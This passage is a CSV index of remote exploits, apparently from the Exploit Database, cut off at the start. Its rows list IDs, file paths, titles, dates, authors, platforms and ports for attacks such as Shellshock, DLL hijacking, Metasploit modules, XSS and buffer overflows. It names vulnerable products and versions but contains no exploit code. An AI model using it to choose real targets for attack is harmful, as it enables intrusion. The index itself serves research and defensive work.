Leitch",remote,windows, +34691,exploits/multiple/remote/34691.txt,"CollabNet Subversion Edge Log Parser - HTML Injection",2010-09-21,"Sumit Kumar Soni",remote,multiple, +34695,exploits/windows/remote/34695.c,"GreenBrowser - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,remote,windows, +34696,exploits/windows/remote/34696.c,"Easy Office Recovery - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,remote,windows, +34697,exploits/windows/remote/34697.c,"Sothink SWF Decompiler - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,remote,windows, +34821,exploits/windows/remote/34821.txt,"Installshield 2009 15.0.0.53 Premier - 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite",2009-09-15,the_Edit0r,remote,windows, +34823,exploits/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 - 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution",2010-10-08,anT!-Tr0J4n,remote,windows, +34756,exploits/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 - Command Injection (Metasploit)",2014-09-24,Metasploit,remote,windows,3000 +34757,exploits/windows/remote/34757.rb,"Advantech Webaccess - dvs.ocx GetColor Buffer Overflow (Metasploit)",2014-09-24,Metasploit,remote,windows, +34765,exploits/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",remote,linux, +34766,exploits/linux/remote/34766.php,"Bash - Environment Variables Command Injection (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",remote,linux,80 +34768,exploits/windows/remote/34768.c,"VirIT eXplorer 6.7.43 - 'tg-scan.dll' DLL Loading Arbitrary Code Execution",2010-09-27,anT!-Tr0J4n,remote,windows, +34777,exploits/cgi/remote/34777.rb,"GNU Bash - Environment Variable Command Injection (Metasploit)",2014-09-25,"Shaun Colley",remote,cgi, +34796,exploits/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation",2010-08-03,"Libing Song",remote,multiple, +34802,exploits/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",remote,hardware, +34815,exploits/windows/remote/34815.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)",2014-09-29,"ryujin & sickness",remote,windows, +34829,exploits/windows/remote/34829.c,"Adobe Dreamweaver CS4 - 'mfc80esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,remote,windows, +34830,exploits/windows/remote/34830.c,"IsoBuster 2.7 - 'wnaspi32.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,remote,windows, +34831,exploits/windows/remote/34831.c,"NetStumbler 0.4 - 'mfc71esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,remote,windows, +34832,exploits/windows/remote/34832.c,"Microsoft Visio 2007 - 'mfc80esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,remote,windows, +34835,exploits/windows/remote/34835.py,"e2eSoft VCam - DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,remote,windows, +34836,exploits/windows/remote/34836.py,"Notepad++ 5.8.2 - 'libtidy.dll' DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,remote,windows, +34838,exploits/windows/remote/34838.c,"Torrent DVD Creator - 'quserex.dll' DLL Loading Arbitrary Code Execution",2010-10-13,anT!-Tr0J4n,remote,windows, +34844,exploits/windows/remote/34844.c,"STDU Explorer 1.0.201 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-15,anT!-Tr0J4n,remote,windows, +34846,exploits/windows/remote/34846.txt,"httpdx 1.4.5 - dot Character Remote File Disclosure",2009-10-09,Dr_IDE,remote,windows, +34848,exploits/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,remote,windows, +34853,exploits/windows/remote/34853.c,"PowerDVD 5.0.1107 - 'trigger.dll' DLL Loading Arbitrary Code Execution",2010-10-19,"Inj3cti0n P4ck3t",remote,windows, +34856,exploits/windows/remote/34856.py,"Kolibri WebServer 2.0 - Remote Buffer Overflow (EMET 5.0 / EMET 4.1 Partial Bypass)",2014-10-02,tekwizz123,remote,windows,80 +34860,exploits/linux/remote/34860.py,"GNU bash 4.3.11 - Environment Variable dhclient",2014-10-02,@0x00string,remote,linux, +34862,exploits/linux/remote/34862.rb,"Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)",2014-10-02,Metasploit,remote,linux,21 +34866,exploits/linux/remote/34866.rb,"HP Network Node Manager I - PMD Buffer Overflow (Metasploit)",2014-10-02,Metasploit,remote,linux,7426 +34867,exploits/java/remote/34867.rb,"ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)",2014-10-02,"Pedro Ribeiro",remote,java,80 +34868,exploits/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 - DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,remote,windows, +34869,exploits/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,remote,windows, +34870,exploits/windows/remote/34870.html,"VideoLAN VLC Media Player 1.1.4 Mozilla MultiMedia Plugin - Remote Code Execution",2010-10-19,shinnai,remote,windows, +34879,exploits/linux/remote/34879.txt,"OpenVPN 2.2.29 - Remote Command Injection (Shellshock)",2014-10-04,"hobbily plunt",remote,linux, +34881,exploits/linux/remote/34881.html,"Mozilla Firefox SeaMonkey 3.6.10 / Thunderbird 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",remote,linux, +34896,exploits/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Command Injection (Shellshock)",2014-10-06,"Phil Blank",remote,linux, +34900,exploits/linux/remote/34900.py,"Apache mod_cgi - Remote Command Injection (Shellshock)",2014-10-06,"Federico Galatolo",remote,linux, +34925,exploits/php/remote/34925.rb,"WordPress Plugin InfusionSoft - Arbitrary File Upload (Metasploit)",2014-10-09,Metasploit,remote,php,80 +34926,exploits/windows/remote/34926.rb,"Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,remote,windows,80 +34927,exploits/unix/remote/34927.rb,"F5 iControl - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,remote,unix,443 +34931,exploits/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",remote,windows, +34932,exploits/linux/remote/34932.html,"NitroView ESM - 'ess.pm' Remote Command Execution",2010-10-26,s_n,remote,linux, +34943,exploits/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",remote,windows, +34945,exploits/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal",2010-11-01,"John Leitch",remote,multiple, +34949,exploits/multiple/remote/34949.py,"BroadWorks - Call Detail Record Security Bypass",2010-11-02,"Nick Freeman",remote,multiple, +34950,exploits/php/remote/34950.php,"PHP 5.3.2 - 'xml_utf8_decode()' UTF-8 Input Validation",2009-05-11,root@80sec.com,remote,php, +34952,exploits/multiple/remote/34952.txt,"Apache Shiro - Directory Traversal",2010-11-02,"Luke Taylor",remote,multiple, +34978,exploits/windows/remote/34978.c,"Silo 2.1.1 - 'wintab32.dll' DLL Loading Arbitrary Code Execution",2010-11-08,"Gjoko Krstic",remote,windows, +34979,exploits/php/remote/34979.php,"PHP 5.3.x - 'mb_strcut()' Information Disclosure",2010-11-07,"Mateusz Kocielski",remote,php, +34985,exploits/php/remote/34985.txt,"pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-05,"dave b",remote,php, +34986,exploits/hardware/remote/34986.txt,"D-Link DIR-300 - Multiple Security Bypass Vulnerabilities",2010-11-09,"Karol Celia",remote,hardware, +34997,exploits/windows/remote/34997.txt,"DServe - Multiple Cross-Site Scripting Vulnerabilities",2010-11-16,Axiell,remote,windows, +34998,exploits/linux/remote/34998.txt,"Eclipse 3.6.1 - Help Server 'help/index.jsp' Cross-Site Scripting",2010-11-16,"Aung Khant",remote,linux, +34999,exploits/linux/remote/34999.txt,"Eclipse 3.6.1 - Help Server 'help/advanced/content.jsp' Cross-Site Scripting",2010-11-16,"Aung Khant",remote,linux, +35001,exploits/windows/remote/35001.txt,"SAP NetWeaver 7.0 - SQL Monitor Multiple Cross-Site Scripting Vulnerabilities",2010-11-17,a.polyakov,remote,windows, +35002,exploits/windows/remote/35002.html,"VideoLAN VLC Media Player 1.1.x - Calling Convention Remote Buffer Overflow",2010-11-02,shinnai,remote,windows, +35003,exploits/multiple/remote/35003.txt,"IBM OmniFind - 'command' Cross-Site Scripting",2010-11-09,"Fatih Kilic",remote,multiple, +35005,exploits/windows/remote/35005.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",remote,windows, +35006,exploits/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",remote,windows, +35007,exploits/windows/remote/35007.c,"Native Instruments (Multiple Products) - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",remote,windows, +35011,exploits/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting",2010-11-22,"Adam Muntner",remote,linux, +35014,exploits/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",remote,hardware, +35018,exploits/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Stack Overflow",2014-10-20,"Nick Sampanis",remote,linux, +35032,exploits/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService - Arbitrary File Upload (Metasploit)",2014-10-21,Metasploit,remote,windows, +35033,exploits/php/remote/35033.rb,"Joomla! Component Akeeba Kickstart - Unserialize Remote Code Execution (Metasploit)",2014-10-21,Metasploit,remote,php,80 +35034,exploits/multiple/remote/35034.rb,"HP Data Protector - 'EXEC_INTEGUTIL' Remote Code Execution (Metasploit)",2014-10-21,Metasploit,remote,multiple,5555 +35051,exploits/windows/remote/35051.txt,"Freefloat FTP Server - Directory Traversal",2010-12-06,Pr0T3cT10n,remote,windows, +35055,exploits/windows/remote/35055.py,"Microsoft Windows - OLE Remote Code Execution 'Sandworm' (MS14-060)",2014-10-25,"Mike Czumak",remote,windows, +35062,exploits/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow",2010-12-07,"Luigi Auriemma",remote,multiple, +35068,exploits/hardware/remote/35068.txt,"pfSense - 'pkg_edit.php?id' Cross-Site Scripting",2010-11-08,"dave b",remote,hardware, +35069,exploits/hardware/remote/35069.txt,"pfSense - 'pkg.php?xml' Cross-Site Scripting",2010-11-08,"dave b",remote,hardware, +35070,exploits/hardware/remote/35070.txt,"pfSense - 'status_graph.php?if' Cross-Site Scripting",2010-11-08,"dave b",remote,hardware, +35071,exploits/hardware/remote/35071.txt,"pfSense - 'interfaces.php?if' Cross-Site Scripting",2010-11-08,"dave b",remote,hardware, +35078,exploits/unix/remote/35078.rb,"Centreon - SQL Injection / Command Injection (Metasploit)",2014-10-27,Metasploit,remote,unix,80 +35092,exploits/multiple/remote/35092.html,"Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",remote,multiple, +35095,exploits/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",remote,linux, +35103,exploits/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,remote,hardware, +35115,exploits/linux/remote/35115.rb,"CUPS Filter - Bash Environment Variable Code Injection (Metasploit)",2014-10-29,Metasploit,remote,linux,631 +35119,exploits/windows/remote/35119.txt,"Alt-N WebAdmin 3.3.3 - Remote Source Code Information Disclosure",2010-12-17,wsn1983,remote,windows, +35130,exploits/windows/remote/35130.txt,"Calibre 0.7.34 - Cross-Site Scripting / Directory Traversal",2010-12-21,waraxe,remote,windows, +35132,exploits/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) - Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",remote,linux, +35144,exploits/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting",2010-12-23,"Gjoko Krstic",remote,multiple, +35148,exploits/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for E-Business - Directory Traversal",2010-12-24,anonymous,remote,linux, +35151,exploits/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) - 'Patch' DLM (Metasploit)",2014-11-03,Metasploit,remote,hardware,9100 +35166,exploits/windows/remote/35166.c,"Ace Video Workshop 1.2.0.0 - 'ir50_lcs.dll' DLL Loading Arbitrary Code Execution",2011-01-03,d3c0der,remote,windows, +35170,exploits/hardware/remote/35170.txt,"Lexmark X651de - Printer Ready Message Value HTML Injection",2011-01-06,"dave b",remote,hardware, +35171,exploits/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Executions",2011-01-05,d3c0der,remote,windows, +35180,exploits/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,remote,bsd, +35183,exploits/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,remote,php,80 +35184,exploits/hardware/remote/35184.py,"Belkin N750 - 'jump?login' Remote Buffer Overflow",2014-11-06,"Marco Vaz",remote,hardware,8080 +35188,exploits/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Remote Buffer Overflow",2011-01-10,"John Leitch",remote,windows, +35190,exploits/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,remote,windows, +35211,exploits/java/remote/35211.rb,"Visual Mining NetCharts Server - Remote Code Execution (Metasploit)",2014-11-10,Metasploit,remote,java,8001 +35225,exploits/windows/remote/35225.c,"Avira AntiVir Personal - Multiple Code Execution Vulnerabilities (1)",2011-01-14,D.Elser,remote,windows, +35226,exploits/windows/remote/35226.py,"Avira AntiVir Personal - Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,remote,windows, +35229,exploits/windows/remote/35229.html,"Microsoft Internet Explorer 11 - OLE Automation Array Remote Code Execution (1)",2014-11-13,yuange,remote,windows, +35230,exploits/windows/remote/35230.rb,"Microsoft Internet Explorer < 11 - OLE Automation Array Remote Code Execution (Metasploit)",2014-11-13,"Wesley Neelen & Rik van Duijn",remote,windows, +35232,exploits/linux/remote/35232.txt,"Pango Font Parsing - 'pangoft2-render.c' Heap Corruption",2011-01-18,"Dan Rosenberg",remote,linux, +35241,exploits/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 - '.zip' Remote Buffer Overflow",2011-01-19,"C4SS!0 G0M3S",remote,windows, +35242,exploits/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE - 'Help Server help/advanced/searchView.jsp?SearchWord' Cross-Site Scripting",2008-04-24,Rob,remote,multiple, +35243,exploits/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE - 'Help Server help/advanced/workingSetManager.jsp?workingSet' Cross-Site Scripting",2008-04-24,Rob,remote,multiple, +35252,exploits/multiple/remote/35252.php,"libxml2 2.6.x - 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure",2011-01-24,"Kees Cook",remote,multiple, +35273,exploits/windows/remote/35273.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)",2014-11-17,"ryujin & sickness",remote,windows, +35284,exploits/multiple/remote/35284.pl,"Opera Web Browser 11.00 - 'option' HTML Element Integer Overflow",2011-01-25,"C4SS!0 G0M3S",remote,multiple, +35280,exploits/windows/remote/35280.txt,".NET Remoting Services - Remote Command Execution",2014-11-17,"James Forshaw",remote,windows, +35282,exploits/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser - Remote Code Execution (Metasploit)",2014-11-18,Metasploit,remote,android, +35283,exploits/php/remote/35283.rb,"MantisBT XmlImportExport Plugin - PHP Code Injection (Metasploit)",2014-11-18,Metasploit,remote,php,80 +35308,exploits/windows/remote/35308.html,"Microsoft Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / PowerShell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",remote,windows, +35314,exploits/linux/remote/35314.txt,"Wireshark 1.4.3 - '.pcap' Memory Corruption",2011-02-03,"Huzaifa Sidhpurwala",remote,linux, +35316,exploits/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management - Authentication Bypass",2011-02-04,"Zack Fasel & Matthew Jakubowski",remote,multiple, +35317,exploits/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products - Information Disclosure",2011-02-07,Rapid7,remote,hardware, +35318,exploits/windows/remote/35318.c,"Cain & Abel 2.7.3 - 'dagc.dll' DLL Loading Arbitrary Code Execution",2011-02-07,d3c0der,remote,windows, +35380,exploits/php/remote/35380.rb,"Pandora Fms - SQL Injection Remote Code Execution (Metasploit)",2014-11-26,Metasploit,remote,php,80 +40431,exploits/hardware/remote/40431.txt,"NetMan 204 - Backdoor Account",2016-09-27,"Saeed reza Zamanian",remote,hardware, +35352,exploits/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 - 'WEBrick::HTTPRequest' Module HTTP Header Injection",2011-02-16,"Jimmy Bandit",remote,multiple, +35356,exploits/linux/remote/35356.rb,"Hikvision DVR - RTSP Request Remote Code Execution (Metasploit)",2014-11-24,Metasploit,remote,linux,554 +35364,exploits/multiple/remote/35364.txt,"IBM Lotus Sametime - '/stconf.nsf/WebMessage?messageString' Cross-Site Scripting",2011-02-21,"Dave Daly",remote,multiple, +35366,exploits/multiple/remote/35366.txt,"IBM Lotus Sametime - stconf.nsf Cross-Site Scripting",2011-02-21,"Dave Daly",remote,multiple, +35386,exploits/linux/remote/35386.txt,"Logwatch Log File - Special Characters Privilege Escalation",2011-02-24,"Dominik George",remote,linux, +35398,exploits/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,remote,multiple, +35399,exploits/windows/remote/35399.pl,"DivX Player 6.x - '.dps' Remote Buffer Overflow",2011-02-28,KedAns-Dz,remote,windows, +35420,exploits/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - 'UltraMJCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,remote,hardware, +35421,exploits/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - 'UltraSVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,remote,hardware, +35422,exploits/hardware/remote/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - 'UltraHVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,remote,hardware, +35427,exploits/bsd/remote/35427.py,"tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side",2014-12-02,dash,remote,bsd, +35433,exploits/osx/remote/35433.pl,"Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow",2011-03-09,KedAns-Dz,remote,osx, +35434,exploits/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",remote,windows, +35441,exploits/multiple/remote/35441.rb,"Tincd - Authenticated Remote TCP Stack Buffer Overflow (Metasploit)",2014-12-02,Metasploit,remote,multiple,655 +35446,exploits/windows/remote/35446.pl,"Microsoft Windows Movie Maker 2.1.4026 - '.avi' Remote Buffer Overflow",2011-03-10,KedAns-Dz,remote,windows, +35474,exploits/windows/remote/35474.py,"Microsoft Windows Kerberos - Privilege Escalation (MS14-068)",2014-12-05,"Sylvain Monne",remote,windows, +35464,exploits/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 - URI SecURIty Bypass",2011-03-14,"DcLabs Security Research Group",remote,multiple, +35466,exploits/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution",2011-03-05,"RedTeam Pentesting GmbH",remote,linux, +35468,exploits/windows/remote/35468.pl,"Monkey's Audio - '.ape' Remote Buffer Overflow",2011-03-16,KedAns-Dz,remote,windows, +35495,exploits/multiple/remote/35495.txt,"Advantech/BroadWin SCADA Webaccess 7.0 - Multiple Vulnerabilities",2011-03-23,"Ruben Santamarta",remote,multiple, +35501,exploits/multiple/remote/35501.pl,"RealPlayer 11 - '.rmp' Remote Buffer Overflow",2011-03-27,KedAns-Dz,remote,multiple, +35509,exploits/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow",2011-03-27,KedAns-Dz,remote,windows, +35513,exploits/linux/remote/35513.py,"Apache James Server 2.3.2 - Remote Command Execution",2014-12-10,"Jakub Palaczynski",remote,linux,4555 +35560,exploits/windows/remote/35560.txt,"RealNetworks GameHouse 'InstallerDlg.dll' 2.6.0.445 ActiveX Control - Multiple Vulnerabilities",2011-04-03,rgod,remote,windows, +35563,exploits/windows/remote/35563.pl,"EasyPHP 5.3.5.0 - 'index.php' Arbitrary File Download",2011-04-03,KedAns-Dz,remote,windows, +35549,exploits/unix/remote/35549.rb,"ActualAnalyzer - 'ant' Cookie Command Execution (Metasploit)",2014-12-16,Metasploit,remote,unix,80 +35545,exploits/php/remote/35545.rb,"Tuleap - PHP Unserialize Code Execution (Metasploit)",2014-12-15,Metasploit,remote,php,80 +35554,exploits/linux/remote/35554.txt,"Perl 5.x - 'lc()' / 'uc()' TAINT Mode Protection Security Bypass",2011-03-30,mmartinec,remote,linux, +35570,exploits/multiple/remote/35570.txt,"python-feedparser 5.0 - '/feedparser/feedparser.py' Cross-Site Scripting",2011-04-05,fazalmajid,remote,multiple, +35573,exploits/windows/remote/35573.txt,"Microsoft Excel - Remote Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",remote,windows, +35581,exploits/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",remote,linux,6082 +35597,exploits/hardware/remote/35597.txt,"FiberHome HG-110 - Cross-Site Scripting / Directory Traversal",2011-04-08,Zerial,remote,hardware, +35606,exploits/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",remote,linux, +35612,exploits/windows/remote/35612.pl,"Winamp 5.6.1 - '.m3u8' Remote Buffer Overflow",2011-04-12,KedAns-Dz,remote,windows, +35614,exploits/windows/remote/35614.c,"EC Software Help & Manual 5.5.1 Build 1296 - 'ijl15.dll' DLL Loading Arbitrary Code Execution",2011-04-14,LiquidWorm,remote,windows, +35620,exploits/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",remote,hardware, +35638,exploits/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf?jdeowpBackButtonProtect' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",remote,multiple, +35639,exploits/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService?e1.namespace' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",remote,multiple, +35640,exploits/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService?e1.namespace' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",remote,multiple, +35641,exploits/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService?RENDER_MAFLET' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",remote,multiple, +35642,exploits/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService?jdemafjasLinkTarget' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",remote,multiple, +35644,exploits/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,remote,linux, +35652,exploits/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution",2014-12-30,drone,remote,windows, +35660,exploits/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload (Metasploit)",2014-12-31,Metasploit,remote,php,80 +35685,exploits/multiple/remote/35685.txt,"Asterisk 1.8.x - SIP INVITE Request User Enumeration",2011-05-02,"Francesco Tornieri",remote,multiple, +35686,exploits/windows/remote/35686.pl,"OpenMyZip 0.1 - '.zip' Remote Buffer Overflow",2011-05-02,"C4SS!0 G0M3S",remote,windows, +35688,exploits/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",remote,hardware, +35694,exploits/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,remote,windows, +35714,exploits/windows/remote/35714.pl,"BlueVoda Website Builder 11 - '.bvp' File Stack Based Buffer Overflow",2011-05-09,KedAns-Dz,remote,windows, +35703,exploits/multiple/remote/35703.py,"sipdroid 2.2 - SIP INVITE Response User Enumeration",2011-05-04,"Anibal Vaz Marques",remote,multiple, +35729,exploits/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,remote,multiple, +35731,exploits/php/remote/35731.rb,"Pandora FMS 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit)",2015-01-08,Metasploit,remote,php,80 +35735,exploits/multiple/remote/35735.txt,"Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting",2011-05-10,"Dr. Marian Ventuneac",remote,multiple, +35740,exploits/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler - Optimization NULL String Remote Code Execution",2011-03-04,"Brian Mancini",remote,windows, +35744,exploits/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 - '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,remote,windows, +35762,exploits/hardware/remote/35762.txt,"Cisco Unified Operations Manager 8.5 - 'iptm/advancedfind.do?extn' Cross-Site Scripting",2011-06-18,"Sense of Security",remote,hardware, +35763,exploits/hardware/remote/35763.txt,"Cisco Unified Operations Manager 8.5 - 'iptm/ddv.do?deviceInstanceName' Cross-Site Scripting",2011-06-18,"Sense of Security",remote,hardware, +35764,exploits/hardware/remote/35764.txt,"Cisco Unified Operations Manager 8.5 - iptm/eventmon Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",remote,hardware, +35765,exploits/hardware/remote/35765.txt,"Cisco Unified Operations Manager 8.5 - '/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",remote,hardware, +35766,exploits/hardware/remote/35766.txt,"Cisco Unified Operations Manager 8.5 - '/iptm/logicalTopo.do' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",remote,hardware, +35776,exploits/java/remote/35776.rb,"Lexmark MarkVision Enterprise - Arbitrary File Upload (Metasploit)",2015-01-13,Metasploit,remote,java,9788 +35777,exploits/windows/remote/35777.rb,"Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit)",2015-01-13,Metasploit,remote,windows, +35778,exploits/php/remote/35778.rb,"WordPress Plugin WP Symposium 14.11 - Arbitrary File Upload (Metasploit)",2015-01-13,Metasploit,remote,php,80 +35779,exploits/hardware/remote/35779.txt,"CiscoWorks Common Services Framework 3.1.1 Help Servlet - Cross-Site Scripting",2011-05-18,"Sense of Security",remote,hardware, +35780,exploits/hardware/remote/35780.txt,"Cisco Unified Operations Manager 8.5 - Common Services Device Center Cross-Site Scripting",2011-05-18,"Sense of Security",remote,hardware, +35784,exploits/linux/remote/35784.php,"Zend Framework 1.11.4 - 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",remote,linux, +35785,exploits/linux/remote/35785.txt,"klibc 1.5.2 - DHCP Options Processing Remote Shell Command Execution",2011-05-18,"maximilian attems",remote,linux, +35790,exploits/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x - Memory Corruption",2011-05-24,"Andy Davis",remote,multiple, +35792,exploits/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 - File Transfer Cross-Site Scripting",2011-05-24,"Kacper Szczesniak",remote,multiple, +35799,exploits/linux/remote/35799.txt,"Vordel Gateway 6.0.3 - Directory Traversal",2011-05-25,"Brian W. Gary",remote,linux, +35800,exploits/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",remote,hardware, +35801,exploits/linux/remote/35801.txt,"Asterisk 1.8.4.1 - SIP 'REGISTER' Request User Enumeration",2011-05-26,"Francesco Tornieri",remote,linux, 